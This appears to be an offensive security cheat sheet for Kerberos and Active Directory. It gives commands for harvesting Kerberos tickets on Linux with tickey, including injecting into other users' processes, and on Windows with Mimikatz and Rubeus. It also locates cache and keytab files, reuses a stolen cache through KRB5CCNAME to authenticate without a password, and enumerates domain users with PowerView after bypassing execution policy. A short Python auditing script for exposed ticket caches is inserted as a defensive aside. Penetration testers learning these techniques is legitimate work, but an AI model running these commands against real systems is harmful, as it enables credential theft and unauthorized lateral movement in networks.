If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.
For FILE tickets, you can copy the cache file (if you have permissions) and use it.
For KEYRING tickets, you can use tickey to get them:
# Dumps the current user's tickets; if run as root, it tries to dump all of them by injecting into other users' processes
# to inject, copy tickey to a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
Harvest tickets from Windows
With Mimikatz:
mimikatz # sekurlsa::tickets /export
With Rubeus in PowerShell:
.\Rubeus dump
# After dumping the tickets in base64 with Rubeus, write them to a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
krb5.keytab
# Linux: cached Kerberos tickets and keytabs
find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null
# Windows: cached Kerberos tickets and keytabs
dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s
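If you find a krb5cc_* file, export its path in the KRB5CCNAME environment variable, then check it with klist
# use the exact file name found above; a glob is not expanded in an assignment
export KRB5CCNAME=/tmp/krb5cc_<uid>
klist
# if klist shows the tickets, the cache is loaded and you can authenticate without a password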
python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>
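The find commands above locate the same files a defender needs to audit. The following check is an added example, not part of the original page: it walks a directory and reports krb5cc_* caches and *.keytab files that are readable beyond their owner, are symlinks, or whose owner differs from the uid in the cache name. The function name and the default path /tmp are assumptions.

```python
import os
import re
import stat
import sys

# krb5cc_<uid> or krb5cc_<uid>_<suffix>: the FILE: cache naming described above
CCACHE_NAME = re.compile(r"^krb5cc_(\d+)(?:_.+)?$")


def audit_kerberos_files(root):
    """Return sorted (path, problem) pairs for ccache/keytab files under root."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            ccache = CCACHE_NAME.match(name)
            if not ccache and not name.lower().endswith(".keytab"):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow a planted symlink
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if stat.S_ISLNK(st.st_mode):
                findings.append((path, "symlink"))
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & 0o077:  # any group or other permission bit set
                findings.append((path, "group/other access (mode %04o)" % mode))
            if ccache and st.st_uid != int(ccache.group(1)):
                findings.append((path, "owner uid %d does not match name" % st.st_uid))
    return sorted(findings)


if __name__ == "__main__":
    # Assumed default: /tmp, where FILE: caches live unless configured otherwise
    target = sys.argv[1] if len(sys.argv) > 1 else "/tmp"
    for path, problem in audit_kerberos_files(target):
        print("%s: %s" % (path, problem))
```

Any finding means the ticket or key material can be copied by an account other than its owner, which is the precondition the file-ticket note at the top of this section relies on.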
PowerView
Import module
powershell -ep bypass
[PS] . .\PowerView.ps1
The Domain Users
Get-NetUser | select cn
# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof